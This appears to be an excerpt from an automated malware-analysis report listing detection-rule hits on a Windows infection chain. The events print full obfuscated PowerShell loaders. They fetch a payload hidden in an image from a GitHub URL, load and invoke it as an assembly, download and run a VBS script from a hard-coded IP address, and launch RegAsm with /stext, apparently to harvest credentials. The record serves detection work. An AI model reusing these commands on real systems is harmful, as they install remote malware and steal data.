tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", ProcessId: 7156, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden 
-executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, ProcessId: 2228, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS", ProcessId: 7156, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy 
bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", ProcessId: 5016, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3092, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", ProcessId: 4072, ProcessName: RegAsm.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 7156, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
